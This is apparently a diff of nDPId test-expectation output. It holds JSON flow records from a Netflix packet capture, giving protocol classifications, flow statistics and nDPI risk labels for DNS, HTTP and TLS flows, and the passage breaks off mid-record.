+00685{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":21,"flow_state":"finished","flow_packets_processed":126,"flow_first_seen":1484319043013,"flow_last_seen":1484319077933,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":119751,"flow_avg_l4_payload_len":950,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53149,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00683{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":22,"flow_state":"finished","flow_packets_processed":21,"flow_first_seen":1484319043665,"flow_last_seen":1484319075730,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":11829,"flow_avg_l4_payload_len":563,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.25","src_port":53150,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00814{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":28,"flow_state":"finished","flow_packets_processed":637,"flow_first_seen":1484319049672,"flow_last_seen":1484319109285,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":702214,"flow_avg_l4_payload_len":1102,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.24","src_port":53153,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"25": {"risk":"HTTP Suspicious Content","severity":"High","risk_score": {"total":510,"client":355,"server":155}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00817{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":53,"flow_state":"finished","flow_packets_processed":31,"flow_first_seen":1484319114406,"flow_last_seen":1484319117555,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8880,"flow_avg_l4_payload_len":286,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53238,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":22,"flow_first_seen":1484319117651,"flow_last_seen":1484319117994,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":8767,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.32.22.214","src_port":53248,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118657,"flow_last_seen":1484319120726,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":32245,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53251,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} +00684{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":41,"flow_first_seen":1484319118658,"flow_last_seen":1484319120053,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39341,"flow_avg_l4_payload_len":959,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"184.25.204.10","src_port":53252,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319032865,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51543,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00675{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319036827,"flow_last_seen":1484319036847,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":95,"flow_tot_l4_payload_len":138,"flow_avg_l4_payload_len":69,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":57719,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":40,"flow_first_seen":1484319035079,"flow_last_seen":1484319073564,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":10839,"flow_avg_l4_payload_len":270,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00818{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":69,"flow_first_seen":1484319035080,"flow_last_seen":1484319073578,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":39376,"flow_avg_l4_payload_len":570,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53133,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00586{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":25,"flow_first_seen":1484319035342,"flow_last_seen":1484319066108,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":6543,"flow_avg_l4_payload_len":261,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.89.39.139","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":1484319114365,"flow_last_seen":1484319114400,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":638,"flow_avg_l4_payload_len":159,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51622,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} -00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00681{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"finished","flow_packets_processed":48,"flow_first_seen":1484319117605,"flow_last_seen":1484319119338,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26449,"flow_avg_l4_payload_len":551,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53239,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.NetFlix","breed":"Fun","category":"Video"}} +00586{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":52,"flow_first_seen":1484319117826,"flow_last_seen":1484319118687,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":22434,"flow_avg_l4_payload_len":431,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53249,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":17,"flow_first_seen":1484319117827,"flow_last_seen":1484319118041,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1384,"flow_tot_l4_payload_len":4172,"flow_avg_l4_payload_len":245,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"52.41.30.5","src_port":53250,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":26,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049641,"flow_last_seen":1484319049665,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":70,"flow_tot_l4_payload_len":108,"flow_avg_l4_payload_len":54,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51728,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319035004,"flow_last_seen":1484319035024,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":51949,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":23,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319048757,"flow_last_seen":1484319048776,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":150,"flow_tot_l4_payload_len":187,"flow_avg_l4_payload_len":93,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":58102,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319117511,"flow_last_seen":1484319117538,"flow_idle_time":180000,"flow_min_l4_payload_len":55,"flow_max_l4_payload_len":183,"flow_tot_l4_payload_len":238,"flow_avg_l4_payload_len":119,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52095,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00676{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319032882,"flow_last_seen":1484319032884,"flow_idle_time":180000,"flow_min_l4_payload_len":54,"flow_max_l4_payload_len":182,"flow_tot_l4_payload_len":236,"flow_avg_l4_payload_len":118,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52116,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} 00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":27,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1484319049645,"flow_last_seen":1484319049681,"flow_idle_time":180000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":329,"flow_tot_l4_payload_len":367,"flow_avg_l4_payload_len":183,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"192.168.1.1","src_port":52347,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319050652,"flow_last_seen":1484319052229,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":41415,"flow_avg_l4_payload_len":781,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.145","src_port":53163,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"finished","flow_packets_processed":58,"flow_first_seen":1484319052216,"flow_last_seen":1484319054100,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43240,"flow_avg_l4_payload_len":745,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.10.139","src_port":53164,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00808{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319054101,"flow_last_seen":1484319056189,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":43241,"flow_avg_l4_payload_len":786,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.3.140","src_port":53171,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"finished","flow_packets_processed":50,"flow_first_seen":1484319056204,"flow_last_seen":1484319063297,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21464,"flow_avg_l4_payload_len":429,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53172,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":34,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1484319056210,"flow_last_seen":1484319062135,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":28763,"flow_avg_l4_payload_len":587,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.133","src_port":53173,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":54,"flow_first_seen":1484319056214,"flow_last_seen":1484319063597,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":21524,"flow_avg_l4_payload_len":398,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53174,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"finished","flow_packets_processed":53,"flow_first_seen":1484319056221,"flow_last_seen":1484319063369,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":26939,"flow_avg_l4_payload_len":508,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53175,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"finished","flow_packets_processed":57,"flow_first_seen":1484319056232,"flow_last_seen":1484319064277,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":428,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53176,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"finished","flow_packets_processed":55,"flow_first_seen":1484319056233,"flow_last_seen":1484319063283,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":25507,"flow_avg_l4_payload_len":463,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53177,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":39,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1484319056233,"flow_last_seen":1484319063789,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":24419,"flow_avg_l4_payload_len":469,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53178,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP.NetFlix","breed":"Fun","category":"Video"}} -00809{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":6999,"source":"netflix.pcap","alias":"nDPId-test","flow_id":40,"flow_state":"finished","flow_packets_processed":60,"flow_first_seen":1484319056234,"flow_last_seen":1484319063566,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":35980,"flow_avg_l4_payload_len":599,"midstream":0,"thread_ts_msec":1484319120726,"l3_proto":"ip4","src_ip":"192.168.1.7","dst_ip":"23.246.11.141","src_port":53179,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"flow_risk": 